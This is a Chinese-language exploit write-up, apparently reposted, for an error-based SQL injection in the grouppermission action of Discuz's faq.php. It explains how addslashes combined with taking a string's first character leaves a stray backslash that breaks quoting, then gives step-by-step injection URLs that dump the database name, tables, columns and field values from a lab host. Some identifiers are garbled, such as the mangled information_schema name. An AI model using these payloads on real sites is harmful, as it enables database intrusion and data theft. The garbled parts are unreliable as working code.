执行命令 ,
http://192.168.50.100/discuz/faq.PHP? action=grouppermission&gids[99]='&gids[100][0]=) and
(select 1 from (select count(*), floor(rand(0)*2 ) x from @R_625_4045@ion_schema.schemata group by x)a) %23
出现报错
查看页面源码
1 //faq?PHP文件 2 ($action == 'grouppermission') { 3 ... 4 ksort($gids); 5 $groupids = array(); 6 foreach($gids as $row) { 7 $groupids[] = $row[0]; 8 } 9 10 $query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")"); 11 ... 12 }
首先定义一个数组groupids,然后遍历$gids(这也是个数组,就是$_GET[gids]),将数组中的所有值的第一位取出来放在groupids中。
为什么这个操作就造成了注入?
discuz在全局会对GET数组进行addslashes转义,也就是说会将'转义成',所以,如果我们的传入的参数是:gids[1]='的话,会被转义成$gids[1]=',而这个赋值语句$groupids[] = $row[0]就相当于取了字符串的第一个字符,也就是,把转义符号取出来了。
再看后面,在将数据放入sql语句前,他用implodeids处理了一遍。我们看到implodeids函数
1 function implodeids($array) { 2 if(!empty($array)) { 3 return "'".implode("','", is_array($array) ? $array : array($array))."'"; 4 } else { 5 return ''; 6 } 7 }
很简单一个函数,就是将刚才的$groupids数组用','分割开,组成一个类似于'1','2','3','4'的字符串返回。
但是我们的数组刚取出来一个转义符,它会将这里一个正常的'转义掉,比如这样:
'1','\','3','4'
有没有看出有点不同,第4个单引号被转义了,也就是说第5个单引号和第3个单引号闭合。
这样3这个位置就等于逃逸出了单引号,也就是产生的注入。把报错语句放在3这个位置,就能报错。
1、爆当前数据库
http://192.168.50.100/discuz/faq.PHP? action=grouppermission&gids[99]='&gids[100][0]=) and
(select 1 from (select count(*),concat(floor(rand(0)*2) ,(select database()))x from @R_625_4045@ion_schema.schemata group by x)a) %23
2、爆数据库
http://192.168.50.100/discuz/faq.PHP? action=grouppermission&gids[99]='&gids[100][0]=) and
(select 1 from (select count(*),concat(floor(rand(0)*2) , 0x7e ,(select schema_name from @R_625_4045@ion_schema.schemata limit 0,1 ))x from @R_625_4045@ion_schema.schemata group by x)a) %23
3、爆表
http://192.168.50.100/discuz/faq.PHP? action=grouppermission&gids[99]='&gids[100][0]=) and
(select 1 from (select count(*),concat(floor(rand(0)*2) , 0x7e ,(select table_name from @R_625_4045@ion_schema.tables where table_schema=database() limit 0,1 ))x from @R_625_4045@ion_schema.schemata group by x)a) %23
使用limit0,1 limit1,1 依次显示表名
记录 discuz.[Table]access
4、爆列名
http://192.168.50.100/discuz/faq.PHP? action=grouppermission&gids[99]='&gids[100][0]=) and
(select 1 from (select count(*),concat(floor(rand(0)*2)
, 0x7e ,(select column_name from @R_625_4045@ion_schema.columns where table_name=access limit 0,1
))x from @R_625_4045@ion_schema.schemata group by x)a) %23
limit 1,1
记录 CHaraCTER_SET_NAME、DEFAULT_COLLATE_NAME
5、爆字段
http://192.168.50.100/discuz/faq.PHP? action=grouppermission&gids[99]='&gids[100][0]=) and
(select 1 from (select count(*),concat(floor(rand(0)*2)
, 0x7e ,(select concat( CHaraCTER_SET_NAME,0x7e,DEFAULT_COLLATE_NAME) from discuz.CHaraCTER_SETS
))x from @R_625_4045@ion_schema.schemata group by x)a) %23
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。